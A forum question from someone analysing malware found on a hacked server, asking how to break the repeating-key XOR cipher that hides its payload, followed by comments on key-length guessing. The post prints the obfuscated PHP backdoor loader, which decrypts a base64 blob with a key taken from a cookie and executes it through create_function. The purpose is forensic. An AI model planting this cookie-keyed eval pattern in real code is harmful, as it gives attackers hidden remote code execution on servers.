# Help me understand how to actually break an XOR/Vigenère cipher

Tags: encryption, xor, vigenere

My friend's server was recently hacked and I'm trying to decipher the malicious files I found in hopes of understanding the hack better. I can tell that they're using an XOR/Vigenère cipher and I've tried to learn everything I could about that on my own, but while I am a programmer I'm not a cryptographer and most of what I've found has gone over my head. I'm wondering if someone here would be kind enough to walk me through what I would actually need to do to break the cipher.

Here's the code in question:

```
<?php

$vewusl = 'ZW5jMTMz...XBzazt9KCRzJXMn'; //Truncated from 1165 lines of encrypted data by me, the guy asking this question

$_igophqd = create_function ('$vewusl', igophqd (base64_decode (
    'VRNSChUZGhAfX1FYQwpBU0IbBwBKBAJQbVQEUAtQUEEQTRQwXXtWcmJwZ29lVmhjIGo'.
    'DJ0EndzJ3QzV7D3FRIlg3aSNZfGZhZmB4f2YFfGUwUDQnaDBnMWdmJGVUAFcyRxZrNF'.
    '54anFfWlVxcQZ3ZggGISNvIGI3YGE2YjVhbyZmEVY3BXtqZ094fWICK3xvUmUvMlE3c'.
    'yd0VARiNkB0MwAGcCFgbFFiUHNncEsjVHEFegckCSBlImdDKGExYmUwYQl2N2BoZlJ1'.
    'UnNgYgp1ZTBHJjNSFWYscFMiexNDYTNbKGs+TXR3cQdGdH9yU1NlIFc2InswUDFzVDR'.
    'xVXV3JWEkeyRnAVR2T2x1dGJXUnQOSzwgfCRSNnN9LWI2V20ncQ1xIXB/c2JfDmx2RC'.
    'tzfxpqNiQIIHwgXmEjZTJ9djBlKH4xBE53dQdOfm9xFmZ0DmUiKWtQbiNgUzlwHFB0I'.
    'gAVYCJjb3RjZQZuf2ZSY2RSdTMiCThiN2BhLHZVR2MicQ5iIwQBZXNAA3VmAlZpYQVc'.
    'LSZsCmUhWkMtYjZXeylIUHojdw1mYVxvbHNLI1ZyCWY9JmwodiZkUwBhMWVvNEcrVyR'.
    '0c2BxcQ5jcmISZn8gfQcna1B2IXB5NnsPZlQmdjNqJHd3fGJiD39/ZjNqciRyLDN/N3'.
    'whA3UCUSZudDJcCmIuTXNWd094cWACK1JwDgYnM3wkZSBKeS9iMn1iM1w0agRNe1Z0B'.
    '2R7YUsjVnIOAwAifCt6IgJ5NWExcVEkWzx7I1IIcGVfbHFhcQVhYzBDASdrUHUhc182'.
    'dSZhfDBYN1Y3Ugx0ZWZ8dHFyKFRmBWE2IwgWYjdgYS52E1ByJmI/cS5dY3x2T1VkZl8'.
    'wc1YndjQ7fCR+NnBqJmIzXHQ5YlB4BGMNZndPYGVmZVt2ZgpqAydBJ3cyd0MoYTVQYi'.
    'QBIHUzY1Fwdwd0fmVEK2F1J3EiJG8OViFwfiR1DF96MFg3ZjFndHN2BlF4cXYaYWIwe'.
    'TI0XiNFJmRlJmslfmQmYgpmNGcBVHR1e1BydlNzcFJ2PTl7O3YiAwQ7ZAx5CEYZSRNC'.
    'anp9f3x/cxdoEURFPUEAEVUAVwEaF08USBQSPhdJE0JqandiYXNkbBQqZGMybC0uajU'.
    'TORttSBpN'
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_igophqd($vewusl); 

function igophqd ($udopz, $bgsqhbl) { return $udopz ^ str_repeat ($bgsqhbl, ceil (strlen ($udopz) / strlen ($bgsqhbl))); }
```

I obviously don't have access to the data stored in the cookie. All the malicious files are the same, so I don't think we can use two of them to figure out the key.

Since the encrypted code creates a function, I assume it's executable PHP which likely has spaces, dollar signs, and other coding symbols. I tried using every tool I could find to help with this ([xortool](https://github.com/hellman/xortool), [XORRepeatingKeyCrypto](https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1), [XORSearch & XORStrings](https://blog.didierstevens.com/programs/xorsearch/), [xorbruteforcer](http://eternal-todo.com/var/scripts/xorbruteforcer), [iheartxor](https://hooked-on-mnemonics.blogspot.com/p/iheartxor.html), [NoMoreXOR](https://github.com/hiddenillusion/NoMoreXOR)) but mind you I'm not really trained to use any of those.

Based on my analysis I suspect the key contains x62 and is either 32, 36, or 28 characters long, but again, I'm not an expert at this stuff. The key may also contain: x16,x17,x0d,x0f,x33,x66,x36,6,T,12...

**Edit**

I understand the programming part just fine, but I thought it might be useful to have the context. Here's the just the cipher I'm trying to break, which I think is XOR encrypted with a repeating key:

```
VRNSChUZGhAfX1FYQwpBU0IbBwBKBAJQbVQEUAtQUEEQTRQwXXtWcmJwZ29lVmhjIGoDJ0EndzJ3QzV7D3FRIlg3aSNZfGZhZmB4f2YFfGUwUDQnaDBnMWdmJGVUAFcyRxZrNF54anFfWlVxcQZ3ZggGISNvIGI3YGE2YjVhbyZmEVY3BXtqZ094fWICK3xvUmUvMlE3cyd0VARiNkB0MwAGcCFgbFFiUHNncEsjVHEFegckCSBlImdDKGExYmUwYQl2N2BoZlJ1UnNgYgp1ZTBHJjNSFWYscFMiexNDYTNbKGs+TXR3cQdGdH9yU1NlIFc2InswUDFzVDRxVXV3JWEkeyRnAVR2T2x1dGJXUnQOSzwgfCRSNnN9LWI2V20ncQ1xIXB/c2JfDmx2RCtzfxpqNiQIIHwgXmEjZTJ9djBlKH4xBE53dQdOfm9xFmZ0DmUiKWtQbiNgUzlwHFB0IgAVYCJjb3RjZQZuf2ZSY2RSdTMiCThiN2BhLHZVR2MicQ5iIwQBZXNAA3VmAlZpYQVcLSZsCmUhWkMtYjZXeylIUHojdw1mYVxvbHNLI1ZyCWY9JmwodiZkUwBhMWVvNEcrVyR0c2BxcQ5jcmISZn8gfQcna1B2IXB5NnsPZlQmdjNqJHd3fGJiD39/ZjNqciRyLDN/N3whA3UCUSZudDJcCmIuTXNWd094cWACK1JwDgYnM3wkZSBKeS9iMn1iM1w0agRNe1Z0B2R7YUsjVnIOAwAifCt6IgJ5NWExcVEkWzx7I1IIcGVfbHFhcQVhYzBDASdrUHUhc182dSZhfDBYN1Y3Ugx0ZWZ8dHFyKFRmBWE2IwgWYjdgYS52E1ByJmI/cS5dY3x2T1VkZl8wc1YndjQ7fCR+NnBqJmIzXHQ5YlB4BGMNZndPYGVmZVt2ZgpqAydBJ3cyd0MoYTVQYiQBIHUzY1Fwdwd0fmVEK2F1J3EiJG8OViFwfiR1DF96MFg3ZjFndHN2BlF4cXYaYWIweTI0XiNFJmRlJmslfmQmYgpmNGcBVHR1e1BydlNzcFJ2PTl7O3YiAwQ7ZAx5CEYZSRNCanp9f3x/cxdoEURFPUEAEVUAVwEaF08USBQSPhdJE0JqandiYXNkbBQqZGMybC0uajUTORttSBpN
```

And the base64 decoded version:

```
5513520a15191a101f5f5158430a4153421b07004a0402506d5404500b505041104d14305d7b56726270676f65566863206a0327412777327743357b0f71512258376923597c66616660787f66057c653050342768306731676624655400573247166b345e786a715f5a557171067766080621236f2062376061366235616f2666115637057b6a674f787d62022b7c6f52652f3251377327745404623640743300067021606c5162507367704b235471057a0724092065226743286131626530610976376068665275527360620a7565304726335215662c7053227b134361335b286b3e4d7477710746747f72535365205736227b305031735434715575772561247b24670154764f6c7574625752740e4b3c207c245236737d2d6236576d27710d7121707f73625f0e6c76442b737f1a6a362408207c205e612365327d763065287e31044e7775074e7e6f711666740e6522296b506e23605339701c50742200156022636f746365066e7f66526364527533220938623760612c7655476322710e6223040165734003756602566961055c2d266c0a65215a432d6236577b2948507a23770d66615c6f6c734b23567209663d266c2876266453006131656f34472b572474736071710e63726212667f207d07276b5076217079367b0f66542676336a2477777c62620f7f7f66336a7224722c337f377c2103750251266e74325c0a622e4d7356774f787160022b52700e0627337c2465204a792f62327d62335c346a044d7b567407647b614b2356720e0300227c2b7a2202793561317151245b3c7b23520870655f6c716171056163304301276b507521735f367526617c3058375637520c7465667c747172285466056136230816623760612e7613507226623f712e5d637c764f5564665f3073562776343b7c247e36706a2662335c743962507804630d66774f606566655b76660a6a0327412777327743286135506224012075336351707707747e65442b6175277122246f0e5621707e24750c5f7a30583766316774737606517871761a6162307932345e2345266465266b257e6426620a663467015474757b50727653737052763d397b3b762203043b640c790846194913426a7a7d7f7c7f7317681144453d410011550057011a174f144814123e174913426a6a77626173646c142a6463326c2d2e6a3513391b6d481a4d
```

Or am I supposed to retain the spaces in the base64 decoded output? I'm guessing that I don't retain the spaces and that this is what I should be trying to break, but these are the kinds of things I'm not sure about.

I also created [a gist with the full file contents](https://gist.github.com/beaulm/d5ff6e26e9ce48e0c8f68b5623507418) in case we need what's in $vewusl in order to crack this cipher.

Comment: a) How should anyone understand this "truncated" code? Where's $vewusl? b) Is your goal a clean server, or really understanding what this (part of) the hack is doing? For a clean server, you don't need to puzzle around here...

Comment: I don't think we really need the truncated code to decipher this and this site wouldn't let me put the full thing in there. I genuinely want to understand this. I know that deciphering it won't make the server clean.

Comment: Well, I'll give it a shot later if nobody else did until then (meaning 10+ hours, because I've got to go now), but ... the key might be (too) long to do anything. ... With it's simple procedure, long symmetric keys, repetitions and so on, this type of cipher is not the best choice for many applications - but nonetheless it can be made as secure as crypto can get, and because of it's simplicity there can't be fancy loopholes that some crypto expert can exploit.

Comment: ...there are of course some things that *could* help, but all they will do is making bruteforce a bit easier. Which can maybe take a (too) long time.

Comment: I'm voting to close this question as off-topic because it's a mix of analyzing ciphertext/algorithm and programming question. I think Stackoverflow (with the crypto-tag) would be better suited than this site.

Comment: I totally understand if you want to close this question because it's off topic. I updated the post to have the plain ciphertext I'm trying to decrypt, as well as a link to the full file. I don't need any help with the programming part, just understanding how to go about deciphering this. I'll post it elsewhere though.

Comment: Got any news on this? I'm asking because I just wanted to ask the same question. I tried some analysis on my own and came in my case to the conclusion that the key must be 4,8 or 16 chars. (But with a *great* error margin.)

Comment: so my file has other variable names but seems otherwise to be pretty the same. Could be that one can make something of it.